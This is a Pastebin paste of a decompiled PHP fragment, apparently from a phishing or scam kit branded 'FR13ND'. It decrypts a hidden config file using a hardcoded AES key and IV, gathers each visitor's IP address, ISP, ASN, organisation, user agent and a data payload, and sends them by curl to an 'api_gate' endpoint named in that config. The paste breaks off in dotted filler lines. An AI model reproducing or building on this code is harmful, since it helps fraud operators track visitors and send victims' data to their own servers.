Guest User

Untitled

a guest
Jun 19th, 2022
40
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.18 KB | None | 0 0
  1. <?php
  2. /**
  3. *
  4. * @ This file is created by http://DeZender.Net
  5. * @ deZender (PHP7 Decoder for ionCube Encoder)
  6. *
  7. * @ Version : 5.0.1.0
  8. * @ Author : DeZender
  9. * @ Release on : 22.04.2022
  10. * @ Official site : http://DeZender.Net
  11. *
  12. */
  13.  
  14. function AesDec($data)
  15. {
  16. $aes = new Aes('Th3reIsN0GoD1337', 'CBC', 'H34rtBl33dD3g1d5');
  17. return $aes->decrypt(base64_decode($data));
  18. }
  19.  
  20. function fr13nd($xdata, ?array $value = NULL)
  21. {
  22. $files = $_SERVER['DOCUMENT_ROOT'] . '/.fr13nd';
  23. $user = json_decode(aesdec(file_get_contents($files)), true);
  24. $dom = preg_replace('/www\\./i', '', $_SERVER['SERVER_NAME']);
  25.  
  26. if (file_exists($files)) {
  27. label30:
  28.  
  29. $ch = curl_init();
  30. if (isset($value) && ($value !== NULL)) {
  31. $data = ['ip' => $_SERVER['REMOTE_ADDR'], 'isp' => $value['ipinfo']['isp'], 'asn' => $value['ipinfo']['as'], 'ua' => $_SERVER['HTTP_USER_AGENT'], 'org' => $value['ipinfo']['org'], 'data' => $xdata];
  32. curl_setopt($ch, CURLOPT_URL, $user[__FUNCTION__]['api'] . 'api_gate?' . http_build_query($data));
  33. curl_setopt($ch, CURLOPT_USERAGENT, 'FR13NDBlocker');
  34. .............................................................
  35. ...................................
  36. ...........
Add Comment
Please, Sign In to add comment